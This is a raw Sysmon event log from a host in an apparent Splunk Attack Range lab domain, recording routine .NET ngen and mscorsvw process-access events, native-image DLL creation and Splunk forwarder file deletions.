21:05:34.669{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.653{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.653{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:34.530{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14f4-0\System.Data.Linq.dll2021-06-23 21:05:34.530 23542300x800000000000000021542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.513{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F2F680E681594DB0D34EA67C49DEBFF,SHA256=776BF8EA469B29F7414E1D063B137402A192E725BA143DA274B8CAD91456746E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.450{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16810E130834E96FFA88FD007A8194BF,SHA256=FD46B09DD49768BE752BAF2A6F17BEF22A309C3F20D56836E24A7BA538E97D24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.669{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74F1800B3517F57674783FD418DE7D0C,SHA256=CA317854BC893731A386C5557FD5355F0F5006F35F85E732CEB7E1901A3A9B88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.606{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.591{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.591{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEAFFC96986C233E8F838C815E9F66B,SHA256=B38FEAF40577383A50160DDB4704CC0F45335541EE31E7BFFCBDF7BA60D15B6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.419{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.403{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.403{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:35.310{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10b4-0\System.Data.OracleClient.dll2021-06-23 21:05:35.310 10341000x800000000000000021566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.669{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.669{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.606{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A220-60D3-7504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.591{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A220-60D3-7504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.591{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A220-60D3-7504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:36.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2C18299BEA84C10FBDE1C4C1D7955B2,SHA256=A7DACA61E86C6E7B17EC87EE4A3C5673BDFEE3DE7436992DB3AE0E206971F60C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:36.481{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b90-0\System.Data.Services.dll2021-06-23 21:05:36.481 10341000x800000000000000021579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.966{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A221-60D3-7904-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.936{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A221-60D3-7904-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.936{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A221-60D3-7904-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:37.841{4DB9351A-A221-60D3-7804-00000000CF01}3680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e60-0\System.Data.Services.Design.dll2021-06-23 21:05:37.841 23542300x800000000000000021575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.622{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=756B86EE4615FCFA920FBE59D76319FD,SHA256=D7F5DBDE775F6947000457F467C57153585300F7AA0CF3EBDD8692455842FA92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.575{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A221-60D3-7804-00000000CF01}3680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:37.560{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A221-60D3-7804-00000000CF01}3680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 